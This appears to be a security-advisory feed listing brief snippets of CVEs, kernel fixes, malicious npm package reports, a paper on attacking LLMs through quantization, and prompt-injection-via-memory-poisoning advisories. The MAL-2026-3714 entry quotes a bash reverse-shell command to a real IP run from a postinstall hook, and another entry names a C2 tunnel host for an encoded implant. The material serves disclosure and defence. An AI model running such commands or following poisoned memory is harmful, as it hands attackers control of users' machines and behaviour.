CVE-2026-42327

The CVE-2026-42327 vulnerability affects rust-openssl bindings for OpenSSL, where X509Ref::ocsp_responders returns OCSP responder URLs from the AIA extension. In versions 0.9.7 through before 0.10.79, the code constructs &str from IA5String bytes using an unchecked UTF-8 assumption, allowing non-...

CVE-2026-42327

rust-openssl provides OpenSSL bindings for the Rust programming language. From 0.9.7 to before 0.10.79, X509Ref::ocspresponders returns OCSP responder URLs from a certificate's AIA extension as OpensslString, whose Deref wraps the raw bytes with str::fromutf8unchecked. OpenSSL does not enforce th...

CLSA-2026-1778769697 kernel: Fix of 31 CVEs

net: skbuff: propagate shared-frag marker through pskbcopy - HID: ignore non-functional sensor in HP 5MP Camera CVE-2025-21992 - net: fix crash when config small gsomaxsize/gsoipv4maxsize CVE-2024-50258 - ipv4: iptunnel: Fix suspicious RCU usage warning in iptunnelinitflow CVE-2024-53042 - ALSA:...

Apache Camel: Camel-Mail: Camel-Mail: Altered application behavior via header injection

A flaw was found in the Camel-Mail component. An attacker can exploit this by sending a specially crafted email to a mailbox monitored by a Camel application. Due to a missing inbound filter, malicious headers within the email are not properly filtered, allowing them to alter the behavior of othe...

rust-openssl 输入验证错误漏洞

rust-openssl is an open-source library in Rust that allows for interaction with the OpenSSL library. In versions 0.9.7 to 0.10.79 of rust-openssl, there was a vulnerability related to input validation errors. This vulnerability stemmed from X509Ref::ocspresponders returning the OCSP responder URL...

Widening the Gap: Exploiting LLM Quantization Via Outlier Injection

LLM quantization has become essential for memory-efficient deployment. Recent work has shown that quantization schemes can pose critical security risks: an adversary may release a model that appears benign in full precision but exhibits malicious behavior once quantized by users. However, existin...

ALPINE-CVE-2026-42926

When NGINX Open Source is configured to proxy HTTP/2 traffic by setting proxyhttpversion to 2, and also uses proxysetbody, an attacker may be able to inject frame headers and payload bytes to the upstream peer. Note: Software versions which have reached End of Technical Support EoTS are not...

MAL-2026-3714 Malicious code in hello-world-pkg-value-value-p (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...

Malicious code in hardhat-common (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis b72f90917aaff5b42d639bff4d28227b0cd2105ce4d2b109577a76b9d7003ecc The OpenSSF Package Analysis project identified 'hardhat-common' @ 2.0.0 npm as malicious. It is considered malicious because: - The package...

MAL-2026-3712 Malicious code in hardhat-common (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis b72f90917aaff5b42d639bff4d28227b0cd2105ce4d2b109577a76b9d7003ecc The OpenSSF Package Analysis project identified 'hardhat-common' @ 2.0.0 npm as malicious. It is considered malicious because: - The package...

Malicious code in vue-template-compiler-plugin (npm)

Full C2 implant disguised as vue-template-compiler fork. postinstall-run.cjs loads tooling-bootstrap.cjs which contains base64-encoded C2 agent. Decoded payload: registers victim hostname, username, OS to Cloudflare tunnel C2 at maiden-apply-looks-education.trycloudflare.com, beacons for tasks,...

PT-2026-40723

Name of the Vulnerable Software and Affected Versions LangSmith SDK Python versions prior to 0.8.0 LangSmith SDK JS/TS versions prior to 0.6.0 Description The prompt pull methods pull prompt and pull prompt commit in Python, and pullPrompt and pullPromptCommit in JS/TS, fetch and deserialize prom...

Context-Aware Web Attack Detection in Open-Source SIEM Systems Via MITRE ATT&CK-Enriched Behavioral Profiling

Security Information and Event Management SIEM systems aggregate log data from heterogeneous sources to detect coordinated attacks. Traditional rule-based correlation engines struggle to classify multi-step web application attacks because they examine each event without reference to the behaviour...

Linux Distros Unpatched Vulnerability : CVE-2026-43323

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - In the Linux kernel, the following vulnerability has been resolved: sched/fair: Fix zerovruntime tracking fix John reported that stress-ng-yield could make his...

MAL-2026-3617 Malicious code in katal-platform-versions (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 8dc8f21e750df73dfe46bbeba3bcfac8e88308adddf33680ce9751e7a1fec4af The OpenSSF Package Analysis project identified 'katal-platform-versions' @ 99.99.99 npm as malicious. It is considered malicious because: - The...

CVE-2026-8368

LWP::UserAgent versions before 6.83 for Perl leak Authorization and Proxy-Authorization headers on cross-origin redirects. On a 3xx response, the redirect handler strips only Host and Cookie before issuing the follow-up request. Caller-supplied Authorization and Proxy-Authorization headers are se...

EUVD-2026-29449

A malicious user could craft input that is stored in conversation memory and later interpreted by the model in an unintended way. Applications using the affected advisor with user-controlled input may be susceptible to manipulation of model behavior across conversation turns...

CVE-2026-41713

A malicious user could craft input that is stored in conversation memory and later interpreted by the model in an unintended way. Applications using the affected advisor with user-controlled input may be susceptible to manipulation of model behavior across conversation turns...

MAL-2026-3618 Malicious code in mimecast-web-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 31248312aa36cca999d7f40ba478d484be495b350e0858850baf3a9a6bf15630 The OpenSSF Package Analysis project identified 'mimecast-web-components' @ 2.0.0 npm as malicious. It is considered malicious because: - The...

CVE-2026-41713 Prompt Injection via Memory Poisoning in PromptChatMemoryAdvisor

A malicious user could craft input that is stored in conversation memory and later interpreted by the model in an unintended way. Applications using the affected advisor with user-controlled input may be susceptible to manipulation of model behavior across conversation turns...